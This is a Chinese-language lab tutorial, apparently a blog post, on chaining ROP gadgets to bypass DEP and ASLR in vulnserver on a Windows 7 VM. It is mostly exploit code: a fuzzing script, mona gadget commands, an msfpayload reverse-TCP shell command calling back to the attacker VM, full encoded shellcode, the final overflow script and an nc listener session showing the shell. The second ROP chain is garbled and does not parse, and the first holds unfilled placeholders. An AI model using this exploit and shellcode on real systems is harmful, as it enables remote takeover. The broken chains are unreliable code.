【网络安全】ROP绕过DEP和ASLR流程实例介绍

本文主要介绍带DEP防护和ASLR功能的操作系统或软件如何被绕过,从而执行漏洞利用和攻击,其它相关知识领域请自行上网搜索。
1、工具软件
ImmunityDebugger1.85
mona 插件
python 2.7.1
vulnserver
win7虚拟机开启所有程序的DEP防护并运行vulnserver,ip 192.168.254.154
kali1.0虚拟机执行攻击脚本,ip 192.168.254.155
打包下载地址:http://download.csdn.net/detail/jiayanhui2877/9111687
查看是否开启了全防护:wmic OS Get DataExecutionPrevention_SupportPolicy
如果返回值不是3请自行设置DEP全防护
2、流程方法
使用如下脚本测试 vulnserver 接收多少数据后会崩溃。测试发现偏移 2006 字节之后崩溃,说明函数 ret 时 EIP 被覆盖成了一个非法地址,程序因此崩溃;所以制作 exploit 时,2006 字节填充之后应放置 rop chain,再之后为 shellcode。

#!/usr/bin/python

import socket
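server = '192.168.254.154'   # Win7 lab VM running vulnserver (section 1)
sport = 9999                 # vulnserver's listening port

#length = int(raw_input('length of attack: '))
# 1000 filler bytes followed by a 2000-byte cyclic pattern: every 4-byte group
# is chr(i)chr(j)chr(k)'A' with i in '0'..'4' and j, k in '0'..'9', so all 500
# groups are distinct and the value left in EIP at the crash can be matched
# back to a byte offset in the buffer (the 2006 figure used in section 5).
prefix = 'A' * 1000
chars = ''.join(chr(i) + chr(j) + chr(k) + 'A'
                for i in range(0x30, 0x35)
                for j in range(0x30, 0x3A)
                for k in range(0x30, 0x3A))

print chars, "\r\n"
attack = prefix + chars

# create_connection() raises instead of leaving a half-set-up socket around
# when the connect fails; try/finally guarantees close() even if a send or
# recv raises.  sendall() loops until the whole buffer is written, whereas
# send() may legally write only part of a 3000-byte message.
s = socket.create_connection((server, sport))
try:
    print s.recv(1024)                         # vulnserver banner
    print "Sending attack to trun . with lenght ", len(attack)
    s.sendall('TRUN .' + attack + '\r\n')      # TRUN is the command under test
    print s.recv(1024)
    s.sendall('EXIT\r\n')
finally:
    s.close()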

3、生成rop链
详细命令如下:

!mona -h //查看帮助
!mona modules //查看模块信息包括哪些模块使用了ASLR
!mona jmp -r esp -m essfunc.dll //查找jmp esp
//jmp esp \xFF\xE4
!mona asm -s jmp esp //将 jmp esp 汇编为机器码(opcode)
!mona find -s "\xFF\xE4"  -m essfunc.dll //在 essfunc.dll 中搜索该机器码
!mona rop -m *.dll -cp nonull //生成rop链

 *** [ Python ] ***

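def create_rop_chain():
    """Return the ROP chain mona.py emitted for vulnserver/essfunc.dll as raw bytes.

    The gadget list is the verbatim ``!mona rop -m *.dll -cp nonull`` output
    shown in section 3 (rop chain generated with mona.py - www.corelan.be).
    mona could not complete it: the three 0x00000000 entries stand in for an
    API pointer it failed to locate, the VirtualAlloc() pointer, and the final
    PUSHAD gadget, so this chain is not usable as-is and is kept only to show
    the output format.  The page's HTML export had stripped the ``'<L'`` format
    string from every ``struct.pack`` call; each entry is one 32-bit
    little-endian value.

    Returns:
        str on Python 2 / bytes on Python 3: 16 * 4 = 64 bytes.
    """
    gadgets = [
        0x00000000,  # [-] Unable to find gadgets to pickup the desired API pointer into esi
        0x00000000,  # [-] Unable to find ptr to &VirtualAlloc()
        0x00402a25,  # POP EBP # RETN [vulnserver.exe]
        0x625011af,  # & jmp esp [essfunc.dll]
        0x625011d8,  # POP EBX # RETN [essfunc.dll]
        0x00000001,  # 0x00000001-> ebx
        0x625011fc,  # POP EDX # RETN [essfunc.dll]
        0x00001000,  # 0x00001000-> edx
        0x6250120c,  # POP ECX # RETN [essfunc.dll]
        0x00000040,  # 0x00000040-> ecx
        0x6250195e,  # POP EDI # POP EBP # RETN [essfunc.dll]
        0x6250172c,  # RETN (ROP NOP) [essfunc.dll]
        0x41414141,  # Filler (compensate)
        0x625011b4,  # POP EAX # RETN [essfunc.dll]
        0x90909090,  # nop
        0x00000000,  # [-] Unable to find pushad gadget
    ]
    # b'' keeps the accumulator the same type struct.pack() returns on both
    # Python 2 (str) and Python 3 (bytes); "" + bytes raises TypeError on 3.
    return b''.join(struct.pack('<L', g) for g in gadgets)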

# Materialise the (incomplete) section-3 chain once; the bytes are only
# displayed here, the chain actually sent is rebuilt in section 5.
rop_chain = create_rop_chain()

4、生成shellcode

msfpayload windows/shell_reverse_tcp LHOST="192.168.254.155" LPORT=443 EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -b '\x00'

输出:
"\xba\x09\x69\x6c\x3e\xdd\xc5\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x52\x31\x50\x12\x03\x50\x12\x83\xe1\x95\x8e\xcb\x0d" +
"\x8d\xcd\x34\xed\x4e\xb2\xbd\x08\x7f\xf2\xda\x59\xd0\xc2" +
"\xa9\x0f\xdd\xa9\xfc\xbb\x56\xdf\x28\xcc\xdf\x6a\x0f\xe3" +
"\xe0\xc7\x73\x62\x63\x1a\xa0\x44\x5a\xd5\xb5\x85\x9b\x08" +
"\x37\xd7\x74\x46\xea\xc7\xf1\x12\x37\x6c\x49\xb2\x3f\x91" +
"\x1a\xb5\x6e\x04\x10\xec\xb0\xa7\xf5\x84\xf8\xbf\x1a\xa0" +
"\xb3\x34\xe8\x5e\x42\x9c\x20\x9e\xe9\xe1\x8c\x6d\xf3\x26" +
"\x2a\x8e\x86\x5e\x48\x33\x91\xa5\x32\xef\x14\x3d\x94\x64" +
"\x8e\x99\x24\xa8\x49\x6a\x2a\x05\x1d\x34\x2f\x98\xf2\x4f" +
"\x4b\x11\xf5\x9f\xdd\x61\xd2\x3b\x85\x32\x7b\x1a\x63\x94" +
"\x84\x7c\xcc\x49\x21\xf7\xe1\x9e\x58\x5a\x6e\x52\x51\x64" +
"\x6e\xfc\xe2\x17\x5c\xa3\x58\xbf\xec\x2c\x47\x38\x12\x07" +
"\x3f\xd6\xed\xa8\x40\xff\x29\xfc\x10\x97\x98\x7d\xfb\x67" +
"\x24\xa8\xac\x37\x8a\x03\x0d\xe7\x6a\xf4\xe5\xed\x64\x2b" +
"\x15\x0e\xaf\x44\xbc\xf5\x38\xab\xe9\x0b\x23\x43\xe8\xf3" +
"\x55\x2f\x65\x15\x3f\x5f\x20\x8e\xa8\xc6\x69\x44\x48\x06" +
"\xa4\x21\x4a\x8c\x4b\xd6\x05\x65\x21\xc4\xf2\x85\x7c\xb6" +
"\x55\x99\xaa\xde\x3a\x08\x31\x1e\x34\x31\xee\x49\x11\x87" +
"\xe7\x1f\x8f\xbe\x51\x3d\x52\x26\x99\x85\x89\x9b\x24\x04" +
"\x5f\xa7\x02\x16\x99\x28\x0f\x42\x75\x7f\xd9\x3c\x33\x29" +
"\xab\x96\xed\x86\x65\x7e\x6b\xe5\xb5\xf8\x74\x20\x40\xe4" +
"\xc5\x9d\x15\x1b\xe9\x49\x92\x64\x17\xea\x5d\xbf\x93\x0a" +
"\xbc\x15\xee\xa2\x19\xfc\x53\xaf\x99\x2b\x97\xd6\x19\xd9" +
"\x68\x2d\x01\xa8\x6d\x69\x85\x41\x1c\xe2\x60\x65\xb3\x03" +
"\xa1"

5、重新编写exploit

#!/usr/bin/python

import socket
import struct

server = '192.168.254.154'   # Win7 lab VM running vulnserver with DEP on (section 1)
sport = 9999                 # vulnserver's listening port

#length = int(raw_input('length of attack: '))
prefix = 'A' * 2006          # filler up to the 2006-byte crash offset measured in section 2
eip = '\xaf\x11\x50\x62'     # 0x625011af little-endian, the essfunc.dll "jmp esp" from
                             # section 3; only the commented-out non-ROP attack line uses it
nopsled = '\x90' * 16        # NOP sled placed between the ROP chain and the payload

# Payload bytes pasted verbatim from the section-4 msfpayload/msfencode output
# (windows/shell_reverse_tcp back to 192.168.254.155:443, x86/shikata_ga_nai
# with \x00 excluded).  The encoder output is not human-readable; it must stay
# byte-identical to what msfencode printed.
exploit = ( 
"\xba\x09\x69\x6c\x3e\xdd\xc5\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x52\x31\x50\x12\x03\x50\x12\x83\xe1\x95\x8e\xcb\x0d" +
"\x8d\xcd\x34\xed\x4e\xb2\xbd\x08\x7f\xf2\xda\x59\xd0\xc2" +
"\xa9\x0f\xdd\xa9\xfc\xbb\x56\xdf\x28\xcc\xdf\x6a\x0f\xe3" +
"\xe0\xc7\x73\x62\x63\x1a\xa0\x44\x5a\xd5\xb5\x85\x9b\x08" +
"\x37\xd7\x74\x46\xea\xc7\xf1\x12\x37\x6c\x49\xb2\x3f\x91" +
"\x1a\xb5\x6e\x04\x10\xec\xb0\xa7\xf5\x84\xf8\xbf\x1a\xa0" +
"\xb3\x34\xe8\x5e\x42\x9c\x20\x9e\xe9\xe1\x8c\x6d\xf3\x26" +
"\x2a\x8e\x86\x5e\x48\x33\x91\xa5\x32\xef\x14\x3d\x94\x64" +
"\x8e\x99\x24\xa8\x49\x6a\x2a\x05\x1d\x34\x2f\x98\xf2\x4f" +
"\x4b\x11\xf5\x9f\xdd\x61\xd2\x3b\x85\x32\x7b\x1a\x63\x94" +
"\x84\x7c\xcc\x49\x21\xf7\xe1\x9e\x58\x5a\x6e\x52\x51\x64" +
"\x6e\xfc\xe2\x17\x5c\xa3\x58\xbf\xec\x2c\x47\x38\x12\x07" +
"\x3f\xd6\xed\xa8\x40\xff\x29\xfc\x10\x97\x98\x7d\xfb\x67" +
"\x24\xa8\xac\x37\x8a\x03\x0d\xe7\x6a\xf4\xe5\xed\x64\x2b" +
"\x15\x0e\xaf\x44\xbc\xf5\x38\xab\xe9\x0b\x23\x43\xe8\xf3" +
"\x55\x2f\x65\x15\x3f\x5f\x20\x8e\xa8\xc6\x69\x44\x48\x06" +
"\xa4\x21\x4a\x8c\x4b\xd6\x05\x65\x21\xc4\xf2\x85\x7c\xb6" +
"\x55\x99\xaa\xde\x3a\x08\x31\x1e\x34\x31\xee\x49\x11\x87" +
"\xe7\x1f\x8f\xbe\x51\x3d\x52\x26\x99\x85\x89\x9b\x24\x04" +
"\x5f\xa7\x02\x16\x99\x28\x0f\x42\x75\x7f\xd9\x3c\x33\x29" +
"\xab\x96\xed\x86\x65\x7e\x6b\xe5\xb5\xf8\x74\x20\x40\xe4" +
"\xc5\x9d\x15\x1b\xe9\x49\x92\x64\x17\xea\x5d\xbf\x93\x0a" +
"\xbc\x15\xee\xa2\x19\xfc\x53\xaf\x99\x2b\x97\xd6\x19\xd9" +
"\x68\x2d\x01\xa8\x6d\x69\x85\x41\x1c\xe2\x60\x65\xb3\x03" +
"\xa1"

)

def create_rop_chain():
    """Return the second mona.py ROP chain (system-DLL gadgets) as a byte string.

    NOTE(review): the page's HTML export stripped every ``'<L',0x........)``
    fragment from the lines below, so only mona's gadget comments survive and
    this function no longer parses as Python; the gadget addresses cannot be
    recovered from this page.  Judging from those comments alone, the chain
    loads a VirtualProtect() pointer from the essfunc.dll IAT and ends in
    PUSHAD # RETN -- unverified, since the values themselves are gone.
    """
# rop chain generated with mona.py - www.corelan.be
    rop_gadgets = ""
    rop_gadgets += struct.pack('# POP ECX # RETN [RPCRT4.dll]
    rop_gadgets += struct.pack('# ptr to &VirtualProtect() [IAT essfunc.dll]
    rop_gadgets += struct.pack('# MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll]
    rop_gadgets += struct.pack('# POP EBP # RETN [msvcrt.dll]
    rop_gadgets += struct.pack('# & jmp esp [NSI.dll]
    rop_gadgets += struct.pack('# POP EAX # RETN [msvcrt.dll]
    rop_gadgets += struct.pack('# Value to negate, will become 0x00000201
    rop_gadgets += struct.pack('# NEG EAX # RETN [RPCRT4.dll]
    rop_gadgets += struct.pack('# XCHG EAX,EBX # RETN [MSCTF.dll]
    rop_gadgets += struct.pack('# POP EAX # RETN [RPCRT4.dll]
    rop_gadgets += struct.pack('# Value to negate, will become 0x00000040
    rop_gadgets += struct.pack('# NEG EAX # RETN [RPCRT4.dll]
    rop_gadgets += struct.pack('# XCHG EAX,EDX # RETN [KERNELBASE.dll]
    rop_gadgets += struct.pack('# POP ECX # RETN [msvcrt.dll]
    rop_gadgets += struct.pack('# &Writable location [user32.dll]
    rop_gadgets += struct.pack('# POP EDI # RETN [RPCRT4.dll]
    rop_gadgets += struct.pack('# RETN (ROP NOP) [RPCRT4.dll]
    rop_gadgets += struct.pack('# POP EAX # RETN [kernel32.dll]
    rop_gadgets += struct.pack('# nop
    rop_gadgets += struct.pack('# PUSHAD # RETN [msvcrt.dll]
    return rop_gadgets

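rop_chain = create_rop_chain()
#attack = prefix + eip + nopsled + exploit
# Buffer layout: 2006 filler bytes, the ROP chain where the return address was
# (replacing the single "jmp esp" address of the commented-out variant), the
# NOP sled, then the encoded payload.
attack = prefix + rop_chain + nopsled + exploit

# create_connection() raises instead of leaving a half-set-up socket around
# when the connect fails; try/finally guarantees close() even if a send or
# recv raises.  sendall() loops until the whole buffer is written, whereas
# send() may legally write only part of a message this long.
s = socket.create_connection((server, sport))
try:
    print s.recv(1024)                         # vulnserver banner
    print "Sending attack to trun . with lenght ", len(attack)
    s.sendall('TRUN .' + attack + '\r\n')
    print s.recv(1024)
    s.sendall('EXIT\r\n')
finally:
    s.close()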

6、kali开启监听
nc -nlvp 443
执行第 5 节的脚本后,可以在 kali 上看到反向连接的信息,此后即可在该 Windows 会话中执行命令;反连的 shellcode 也可以改用 meterpreter,后续操作功能更强大,本文不做详细介绍。
root@kali:/home# nc -nlvp 443
listening on [any] 443 …
connect to [192.168.254.155] from (UNKNOWN) [192.168.254.154] 50121
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\cracktools\vulnserver>
